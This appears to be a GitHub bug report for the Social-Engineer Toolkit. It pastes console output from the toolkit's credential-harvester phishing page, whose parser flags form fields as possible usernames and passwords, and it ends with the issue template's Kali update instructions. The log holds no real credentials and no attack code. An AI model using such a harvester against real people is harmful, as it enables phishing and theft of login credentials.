J0IjqtyhwzNzkyMzMuNT7dAxQ1LDAsNjbFOFncPHBlcmZfZGV2aWNlX2luZm/hg8FKAGVJ1khjcHVfY29yZXNcIjo4LFwicmFtVckkImdwdV9yZW5kZSHnQfY0QU5HTEUgKEludGVsLCAFBxwoUikgSXJpcwEIgFBsdXMgR3JhcGhpY3MgRGlyZWN0M0QxMSB2c181XzAgcAUHCCwgRAEVDClcIiwJYxR2ZW5kb3IFYShHb29nbGUgSW5jLg1nACn+/AH+/AH+/AH+/AFG/AEMNzQuMjL8ASQ2MCwwLDQ1MF1d","user":"0","webSessionId":"613a26:l0c2az:iku3ag","trigger":"falco:web_blue_time_spent_navigation","send_method":"ajax","compression":"snappy_base64","snappy_ms":3}] ------WebKitFormBoundarykqBGcHbAys4y1CnE-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:40] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264681108549420648&req=1&rev=1007985184&s=613a26%3Al0c2az%3Aiku3ag&spin_b=trunk&__spin_r=1007985184&spin_t=1691440378&__user=0&dpr=1&jazoest=2850&lsd=AVo00zASTAI HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarycE95dGG679gru9XS Content-Disposition: form-data; name="ts"
1691440428450 ------WebKitFormBoundarycE95dGG679gru9XS Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"vAyAW1siZmFsY286b2RzX3dlYl9iYXRjaCIseyJlIjoie1wiBRAkXCI6e1wiMTM0NAkKBTMYLmV2ZW50LgU1ZGx1ZV90aW1lX3NwZW50X25hdmlnYXRpb25cBTq4anMudXNlX2JhbnphaS5sb2dfaW1tZWRpYXRlbHlcIjpbMSxudWxsXSxcImpzLmIJJxxwb3N0aW5nXwVnHSUMfSxcIgmBMGZhYnJpYy53d3cuQzP6agB2lgAUcGxhbmVzEZpAd3JpdGVfdG9fdHJhbnNwb3IFnwQyLB3EBbUZKRBxdWV1ZQHEMiUANhQBAR9eCAEBnh0gOQMNaAhlYl9mhAEuHQENMBHBFZgNeU5ZAEhwZXJmX2RldmljZV9pbmZvX2xvAYwAeyWspsMAdssBDZgEZWJSbwCuwgABwwwyOTY2SRAMbXMudFWYCC5xYUEtCRodF0xiaXRzLmpzX2luaXRpYWxpemVkXFmV9DABfX19fSIsInIiOjEsImQiOiIkXnxBY1lSQTN2eEt1T1UyT0F0akRjQ21INmEyYm11bDlfX1YwRWZORlFvVXQyZHBoUFhGX2JrVTBfUnBJNW5hRWpMV05uWFU2aHotVEdfTmt2U1FpREdveDUyTDJiSmlfNWRBN1pKbVNIdkk5Mmp3aks3cVVYY2htWXxmZC5BY2JWRmsyZUNzazRTdW9SaXV3UWtlM0M2anVjSXpGZlVUejNVdWJ2ZS1zNlFoXzBrYU40djY3NWM0MkVwOGIwYk5acjNuT1Y3YlVXYmRCV3RmNmd1MmdtIiwicyI6IjYxM2EyNjpsMGMyYXo6aWt1M2FnIiwidCI6MTY5MTQ0MDM4NDI0MC4yfSwxNjkxNDQwNDI0NDI1LjcsMCwxMDU5XSyRUyHOOWYkX2JpdF9hcnJheZ1eKHNpZF9yYXdcIjpcUnoAJFwiLFwic3RhcnQFSghcIjoRdRwxOSxcInRvcwlTIa8UMjU1LDBdDRYYY3VtXCI6OA0OAGkh0AhcImkFzgBcAVQBOhRsZW5cIjoRSBhzZXFcIjow/usB/usB/usB/usBNusBFDcyNDZ9LDF0ODI3NDMxLjYsMCw0MzBdXQ==","user":"0","webSessionId":"613a26:l0c2az:iku3ag","trigger":"falco:web_time_spent_bit_array","send_method":"ajax","compression":"snappy_base64","snappy_ms":1}] ------WebKitFormBoundarycE95dGG679gru9XS-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:48] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264681108549420648&req=2&rev=1007985184&s=613a26%3Al0c2az%3Aiku3ag&spin_b=trunk&__spin_r=1007985184&spin_t=1691440378&user=0&dpr=1&jazoest=2850&lsd=AVo00zASTAI HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=0 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=3 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=613a26:l0c2az:iku3ag PARAM: hsi=7264681108549420648 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVo00zASTAI PARAM: jazoest=2850 POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691440378 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:09] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=0 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=4 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=613a26:l0c2az:iku3ag PARAM: hsi=7264681108549420648 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVo00zASTAI PARAM: jazoest=2850 POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378 [] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:09] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=0 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=5 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=613a26:l0c2az:iku3ag PARAM: hsi=7264681108549420648 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVo00zASTAI PARAM: jazoest=2850 POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378 [] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:09] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarympb3GRaAhN9Uwuhq Content-Disposition: form-data; name="ts"
1691440492510 ------WebKitFormBoundarympb3GRaAhN9Uwuhq Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"9wWAW1siZmFsY286b2RzX3dlYl9iYXRjaCIseyJlIjoie1wiBRAkXCI6e1wiMTM0NAkKBTMYLmV2ZW50LgE1VHRpbWVfc3BlbnRfYml0X2FycmF5XCIBNGxqcy51c2VfYmFuemFpLmxvZ19pbW1lZGlhdGVsASMkWzEsbnVsbF0sXAErDScgcG9zdGluZ19lAWEEXCIVJVh9LFwiZmFsY28uZmFicmljLnd3dy5DM/pqAHaWABRwbGFuZXMRmkB3cml0ZV90b190cmFuc3Bvci6fAAnEBbUZKRBxdWV1ZVLEAA0pDGViX3RKPwEu2AANKhF8QlMA9BwBfX19IiwiciI6MSwiZCI6IiRefEFjWVJBM3Z4S3VPVTJPQXRqRGNDbUg2YTJibXVsOV9fVjBFZk5GUW9VdDJkcGhQWEZfYmtVMF9ScEk1bmFFakxXTm5YVTZoei1UR19Oa3ZTUWlER294NTJMMmJKaV81ZEE3WkptU0h2STkyandqSzdxVVhjaG1ZfGZkLkFjYlZGazJlQ3NrNFN1b1JpdXdRa2UzQzZqdWNJekZmVVR6M1V1YnZlLXM2UWhfMGthTjR2Njc1YzQyRXA4YjBiTlpyM25PVjdiVVdiZEJXdGY2Z3UyZ20iLCJzIjoiNjEzYTI2OmwwYzJhejppa3UzYWciLCJ0IjoxNjkxNDQwMzkyMjUzLjQwMDF9LDE2BRQ8NDMyNDM5LjIsMCw3MTFdXQ==","user":"0","webSessionId":"613a26:l0c2az:iku3ag","trigger":"falco:web_time_spent_bit_array","send_method":"ajax","compression":"snappy_base64","snappy_ms":1},{"app_id":"256281040558","posts":[["require_cond_exposure_logging",{"identifier":"Aa05C42JXGTNv8gMy9MiYQN4VT0t74_lXD_RchKm5RiarqFX0CIZKFPSAHZOvCiWwh5nWAaOtiI-xEVtU-uFHV0Y35P-_2U"},1691440491501.4,0,112],["gk2_exposure",{"identifier":"1857581","hash":"AT5yTxGMp6le0PAtfZ4"},1691440491501.4,0,53],["falco:web_time_spent_bit_array",{"e":"{\"sid_raw\":\"613a26:l0c2az:iku3ag\",\"start_time\":1691440427,\"tos_array\":[59,0],\"tos_cum\":13,\"tos_id\":\"iku3ag\",\"tos_len\":64,\"tos_seq\":1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9__V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcbVFk2eCsk4SuoRiuwQke3C6jucIzFfUTz3Uubve-s6Qh_0kaN4v675c42Ep8b0bNZr3nOV7bUWbdBWtf6gu2gm","s":":l0c2az:iku3ag","t":1691440451315.9001},1691440491501.4,0,430]],"user":"0","webSessionId":":l0c2az:iku3ag","compression":""}] ------WebKitFormBoundarympb3GRaAhN9Uwuhq-- [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:52] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264681108549420648&req=6&rev=1007985184&s=%3Al0c2az%3Aiku3ag&spin_b=trunk&__spin_r=1007985184&spin_t=1691440378&user=0&dpr=1&jazoest=2850&lsd=AVo00zASTAI HTTP/1.1" 302 - [*] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=0 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=7 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=:l0c2az:iku3ag PARAM: hsi=7264681108549420648 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVo00zASTAI PARAM: jazoest=2850 POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691440378 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:59] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=0 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=8 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=:l0c2az:iku3ag PARAM: hsi=7264681108549420648 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVo00zASTAI PARAM: jazoest=2850 POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378 [] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:59] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 - [] WE GOT A HIT! Printing the output: PARAM: local_storage[Session]=20 PARAM: local_storage[hb_timestamp]=13 PARAM: local_storage[signal_flush_timestamp]=13 PARAM: session_storage[TabId]=6 PARAM: session_storage[sp_pi]=216 PARAM: logtime=0 POSSIBLE USERNAME FIELD FOUND: user=0 PARAM: a=1 PARAM: req=9 PARAM: hs=19576.BP:DEFAULT.2.0..0.0 PARAM: dpr=1 PARAM: ccg=EXCELLENT PARAM: rev=1007985184 PARAM: s=:l0c2az:iku3ag PARAM: hsi=7264681108549420648 PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w PARAM: csr= PARAM: lsd=AVo00zASTAI PARAM: jazoest=2850 POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184 POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378 [] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Set Version
Kali GNU/Linux Rolling
Before opening an issue please make sure you are running the most up to date version of set
We see the same bug reports being opened for issues that have already been fixed in a new release
Set in Kali 2023.2 Please make sure you are running kali-rolling and your system is up to date. To update your system do the following
apt update && apt full-upgrade
Run the following to check your version of Kali
lsb_release -rdc
and you should see the following outputIf you do not see the following output download the ISO from http://cdimage.kali.org/kali-images/kali-weekly/
If you do all of the above and still have an issue then please open a issue.